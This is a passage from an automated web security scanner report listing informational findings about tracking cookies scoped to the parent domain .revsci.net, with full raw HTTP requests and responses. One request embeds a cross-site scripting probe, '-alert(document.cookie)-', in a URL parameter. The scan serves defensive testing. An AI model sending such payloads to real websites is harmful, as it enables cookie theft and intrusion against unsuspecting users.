rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LClyHSCCM0VkQwa9Y=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:14 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a2&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:14 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:13 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.190. http://pix04.revsci.net/F08747/b3/0/3/1003161/715159401.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/715159401.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkfAbX+cer9duzVms+JZMi; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:23 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:23 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/715159401.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkfAbX+cer9duzVms+JZMi; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:23 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:23 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:23 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.191. http://pix04.revsci.net/F08747/b3/0/3/1003161/72215668.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/72215668.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV0HTySI1VkQ4a9A=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:59 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6493&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:59 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/72215668.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV0HTySI1VkQ4a9A=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:59 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6493&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:59 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:59 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.192. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/725558049.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFek+FbxIQlVNYvPseIeEiFPKES2rX32SxfaDo4ZtI52+8kOrN2tIEatD2NFDN28McViXNICZwA3URtRQyHBfvW63RgQEvN3nTlHdbuK0MtbbnRNLsfPWlzdt7bBgxNo9S4ekQFKVzWiMHf/qOY/QXNYa+cLbu/9VZ8kRAQYWrJq/kihnU2RBCuH1K1+fFRUwa7mP5BG9aL0q0hgJSjbS1BrfMo+mR4JdbBcmaGrhNgUzZt5VieerO4+OlKFXeBU9wSUxL5nM7/mfO2Yhj4+eD2WcwbQPAGA==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:14:54 GMT; Path=/
rtc_0=MLsvsNUvcS5nJgFEV8O6cA+G4idxFuQPjAyWrSbmZ3Tbl2Rd84FlLVUcISRc/FsFPa8heywhNNg5oFbPl3F4dMO1sqcRu9XvUH6T+X2ToNJcKBHEUablLssaqzXvV0sN4iDF0eGzgINZcw0zRL+mPOkQo5u7ZqcIkcvVGKIHC87XbFyPcMgOVI28QjWTCBD7gxqlIHS30QpvQ23aySIZt5ZxD55Z2c2GGfqWfBB6nr8wTvbeVNSkATrp9p3laMToYhkfC7XcQCg1sRH6YdvSsYEoFIsVF5hdhhIgDfYapTcthUYv2wg5i1ihR2cqliV1Zn67wjWxNJuVi6joDXBNdhcMPCFqKzLLKTl4ZuhIeYoc9iXeucply5kFJgfG2imXDzFbc7uGwNb8HtbLXtXcaj5yx988Z002RRxTALk7uCob6xDvhIj76C4h3+AECWUFcJk3GJdmjVDlQw==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:14:54 GMT; Path=/
NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:14:54 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/725558049.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.ehow.com%252FMailingList.html%253Fcategory%253DComputer%252BSoftware%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.ehow.com%252Fcomputer-software%252F%253F206d4'-alert(document.cookie)-'dbefd3749fe%253D1%26DM_EOM%3D1&C=F08747 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/MailingList.html?category=Computer+Software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsNUvMS5jJgG89H1UEJzjU+BBsKjEeIf8lOISRcnGovHI6UEjSecnRgLBNT8Lkm0Z6UFH5o7vRFRY8MuMgvGoVqILk+Ef3L6S+U2ToCodNBHEWablLktaqzXvV0/t4mDFE8G7gINZcw0zP9EsmOEEU6Pc75F0M551Bjh6mxtHMOMMxV/2E1w7zZJqYkmO11g8u4n8cdXr5Yef4Q48aNQWoA0k7fEy3bsDcBFH6e+vSJvXkn234H1VDVNDxrAHQmmi+yTuomwDMTdOoyoUQ1MxX3YwfrkMvonvDPbi6tbN+V5N+mbOqiXyakbjBTfgE/guB+ZkwybydKqpQwLhMs7qkXeQkPg1hrdYIqb9PhP1knwNupxp4cYRo/fEk3YFE3VJySPI4vKNXu6zlRzfeEaro4e0qoAh4nGZKHbX4JYfmdbcM11vMwenHTV1G6PILeuesJdg5/blQg==; rsi_segs_1000000=pUPFeU+FbxIQlVNYvPseIeEiFPKES2rX32SxfaDo4ZtI52+8kOrN2tIEatD2NFDN28McViXNICYwA3URtRQyHBfvW63RgQEvN3nTlHdbuK0MtbbnRNLsfPWlzdt7bBgxNo9S4ekQFKVzWiMHf/qOY/QXNYa+cLbu/9VZ8kRAQYWrhsJ+HLJ+yqOn8V4GkKmtekPtTJXDlkksJNGT3X6HLv9RGm8XkpJt5PJt9TPDSc5OwZKZV8wtri33PWONGYK3GBTs+jRoHOaPhNzd/gtf2qT82WcwbdjADw==; 